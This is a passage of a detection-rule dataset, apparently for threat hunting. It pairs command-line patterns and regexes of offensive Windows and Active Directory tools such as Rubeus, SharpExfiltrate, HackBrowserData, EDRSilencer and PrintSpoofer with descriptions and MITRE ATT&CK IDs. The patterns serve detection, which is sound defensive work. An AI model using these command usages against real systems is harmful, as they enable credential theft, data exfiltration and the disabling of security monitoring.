/ptt*",".{0,1000}\.exe\sasktgt\s\/user\:.{0,1000}\s\/aes256\:.{0,1000}\s\/opsec\s\/ptt.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Rubeus More stealthy variant but requires the AES256 key (see 'Dumping OS credentials with Mimikatz' section)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe asktgt /user:* /rc4:* /createnetonly:*cmd.exe*",".{0,1000}\.exe\sasktgt\s\/user\:.{0,1000}\s\/rc4\:.{0,1000}\s\/createnetonly\:.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Rubeus Pass the ticket to a sacrificial hidden process. allowing you to e.g. steal the token from this process (requires elevation)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe asktgt /user:* /rc4:* /ptt*",".{0,1000}\.exe\sasktgt\s\/user\:.{0,1000}\s\/rc4\:.{0,1000}\s\/ptt.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Rubeus Request a TGT as the target user and pass it into the current session","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe --asrep",".{0,1000}\.exe\s\-\-asrep","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*.exe AzureStorage --connectionstring * --filepath * 
--extensions *",".{0,1000}\.exe\sAzureStorage\s\-\-connectionstring\s.{0,1000}\s\-\-filepath\s.{0,1000}\s\-\-extensions\s.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","123","35","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*.exe -b * -p 'C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default'*",".{0,1000}\.exe\s\-b\s.{0,1000}\s\-p\s\'C\:\\Users\\User\\AppData\\Local\\Microsoft\\Edge\\User\sData\\Default\'.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","10","10012","1478","2024-05-01T17:51:49Z","2020-06-18T03:24:31Z" "*.exe -b all -f json --dir results -cc*",".{0,1000}\.exe\s\-b\sall\s\-f\sjson\s\-\-dir\sresults\s\-cc.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","10","10012","1478","2024-05-01T17:51:49Z","2020-06-18T03:24:31Z" "*.exe backupkey /nowrap *.pvk*",".{0,1000}\.exe\sbackupkey\s\/nowrap\s.{0,1000}\.pvk.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*.exe blockedr*",".{0,1000}\.exe\sblockedr.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) 
to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","0","N/A","10","9","876","119","2024-01-24T15:52:24Z","2023-12-26T04:15:39Z" "*.exe BOOKMARKS*",".{0,1000}\.exe\sBOOKMARKS.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*.exe CachedGPPPassword*",".{0,1000}\.exe\sCachedGPPPassword.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.exe certificates /mkfile:*.txt*",".{0,1000}\.exe\scertificates\s\/mkfile\:.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*.exe Certify -action find -enrolleeSuppliesSubject -clientAuth*",".{0,1000}\.exe\sCertify\s\-action\sfind\s\-enrolleeSuppliesSubject\s\-clientAuth.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - 
TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*.exe Certify -action find*",".{0,1000}\.exe\sCertify\s\-action\sfind.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*.exe client *:* R:socks*",".{0,1000}\.exe\sclient\s.{0,1000}\:.{0,1000}\sR\:socks.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - on our compromised target system we connect to this server and tell it to proxy all traffic over it via the reverse SOCKS5 tunnel.","T1071 - T1090 - T1102","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe -cmd ""cmd /c whoami""*",".{0,1000}\.exe\s\-cmd\s\""cmd\s\/c\swhoami\"".{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*.exe compute --sid * --kdskey *",".{0,1000}\.exe\scompute\s\-\-sid\s.{0,1000}\s\-\-kdskey\s.{0,1000}","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","0","N/A","7","2","123","21","2024-04-11T07:51:57Z","2022-02-03T10:32:05Z" "*.exe computername=* command=* username=* password=* nla=true*",".{0,1000}\.exe\scomputername\=.{0,1000}\scommand\=.{0,1000}\susername\=.{0,1000}\spassword\=.{0,1000}\s\snla\=true.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*.exe computername=* command=* username=* password=* takeover=true*",".{0,1000}\.exe\scomputername\=.{0,1000}\scommand\=.{0,1000}\susername\=.{0,1000}\spassword\=.{0,1000}\s\stakeover\=true.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*.exe computername=* command=* username=* password=* 
connectdrive=true*",".{0,1000}\.exe\scomputername\=.{0,1000}\scommand\=.{0,1000}\susername\=.{0,1000}\spassword\=.{0,1000}\sconnectdrive\=true.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*.exe computername=* command=* username=* password=* elevated=taskmgr*",".{0,1000}\.exe\scomputername\=.{0,1000}\scommand\=.{0,1000}\susername\=.{0,1000}\spassword\=.{0,1000}\selevated\=taskmgr.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*.exe computername=* command=* username=* password=* elevated=winr*",".{0,1000}\.exe\scomputername\=.{0,1000}\scommand\=.{0,1000}\susername\=.{0,1000}\spassword\=.{0,1000}\selevated\=winr.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*.exe computername=* command=* username=* password=* exec=cmd*",".{0,1000}\.exe\scomputername\=.{0,1000}\scommand\=.{0,1000}\susername\=.{0,1000}\spassword\=.{0,1000}\sexec\=cmd.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral 
Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*.exe COOKIES*",".{0,1000}\.exe\sCOOKIES.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*.exe create /payload* /kb*",".{0,1000}\.exe\screate\s\/payload.{0,1000}\s\/kb.{0,1000}","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for Lateral Movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nettitude/SharpWSUS","1","0","N/A","N/A","5","428","72","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z" "*.exe credentials /pvk:*.pvk*",".{0,1000}\.exe\scredentials\s\/pvk\:.{0,1000}\.pvk.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*.exe CREDIT_CARDS*",".{0,1000}\.exe\sCREDIT_CARDS.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*.exe -d * -u * -p * -m LDAPS*",".{0,1000}\.exe\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-m\sLDAPS.{0,1000}","offensive_tool_keyword","SharpLdapRelayScan","SharLdapRealyScan 
is a tool to check Domain Controllers for LDAP server protections regarding the relay of NTLM authentication and it's a C# port of LdapRelayScan","T1557.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/klezVirus/SharpLdapRelayScan","1","1","N/A","7","1","75","17","2022-02-26T22:03:11Z","2022-02-12T08:16:59Z" "*.exe -d 1 -c cmd.exe*",".{0,1000}\.exe\s\-d\s1\s\-c\scmd\.exe.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*.exe -d 3 -c *powershell -ep bypass*",".{0,1000}\.exe\s\-d\s3\s\-c\s.{0,1000}powershell\s\-ep\sbypass.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*.exe DCSync -action list*",".{0,1000}\.exe\sDCSync\s\-action\slist.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*.exe DCSync -action write -target *",".{0,1000}\.exe\sDCSync\s\-action\swrite\s\-target\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 -
TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*.exe DomainGPPPassword*",".{0,1000}\.exe\sDomainGPPPassword.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.exe DontReqPreAuth -action list*",".{0,1000}\.exe\sDontReqPreAuth\s\-action\slist.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*.exe DontReqPreAuth -action write -target *",".{0,1000}\.exe\sDontReqPreAuth\s\-action\swrite\s\-target\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*.exe dump /luid:0x5379f2 /nowrap*",".{0,1000}\.exe\sdump\s\/luid\:0x5379f2\s\/nowrap.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation 
tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe elevatecmd runassystem *",".{0,1000}\.exe\selevatecmd\srunassystem\s.{0,1000}","offensive_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*.exe --eventviewer *.exe*",".{0,1000}\.exe\s\-\-eventviewer\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*.exe exec * cmd interactive*",".{0,1000}\.exe\sexec\s.{0,1000}\scmd\sinteractive.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","93","13","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*.exe exec hide *",".{0,1000}\.exe\sexec\shide\s.{0,1000}","offensive_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*.exe --exec --pid * --prog *cmd.exe*",".{0,1000}\.exe\s\-\-exec\s\-\-pid\s.{0,1000}\s\-\-prog\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access 
Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*.exe Get-DomainController -Domain * -Server * -Credential *",".{0,1000}\.exe\sGet\-DomainController\s\-Domain\s.{0,1000}\s\-Server\s.{0,1000}\s\-Credential\s.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","10","921","179","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z" "*.exe -gettgs -luid:*",".{0,1000}\.exe\s\-gettgs\s\-luid\:.{0,1000}","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","5","450","65","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" "*.exe --get-users-list > *",".{0,1000}\.exe\s\-\-get\-users\-list\s\>\s.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "*.exe gmsainfo --sid *",".{0,1000}\.exe\sgmsainfo\s\-\-sid\s.{0,1000}","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","0","N/A","7","2","123","21","2024-04-11T07:51:57Z","2022-02-03T10:32:05Z" "*.exe GoogleDrive --appname * --accesstoken * --filepath * --extensions * 
--memoryonly*",".{0,1000}\.exe\sGoogleDrive\s\-\-appname\s.{0,1000}\s\-\-accesstoken\s.{0,1000}\s\-\-filepath\s.{0,1000}\s\-\-extensions\s.{0,1000}\s\-\-memoryonly.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","123","35","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*.exe --gpo --filter admin --domain*",".{0,1000}\.exe\s\-\-gpo\s\-\-filter\sadmin\s\-\-domain.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*.exe -group=all *",".{0,1000}\.exe\s\-group\=all\s.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*.exe -group=all -AuditPolicies*",".{0,1000}\.exe\s\-group\=all\s\-AuditPolicies.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*.exe -group=all -full*",".{0,1000}\.exe\s\-group\=all\s\-full.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*.exe -group=remote *",".{0,1000}\.exe\s\-group\=remote\s.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*.exe -group=system *",".{0,1000}\.exe\s\-group\=system\s.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*.exe -group=user *",".{0,1000}\.exe\s\-group\=user\s.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*.exe hash /password:*",".{0,1000}\.exe\shash\s\/password\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*.exe HijackablePaths*",".{0,1000}\.exe\sHijackablePaths.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.exe -i -c powershell.exe*",".{0,1000}\.exe\s\-i\s\-c\spowershell\.exe.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*.exe --impersonate --pid *",".{0,1000}\.exe\s\-\-impersonate\s\-\-pid\s.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*.exe kdsinfo --guid *",".{0,1000}\.exe\skdsinfo\s\-\-guid\s.{0,1000}","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","0","N/A","7","2","123","21","2024-04-11T07:51:57Z","2022-02-03T10:32:05Z" "*.exe krbscm -c *cmd.exe*",".{0,1000}\.exe\skrbscm\s\-c\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","384","71","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*.exe -l * -c 
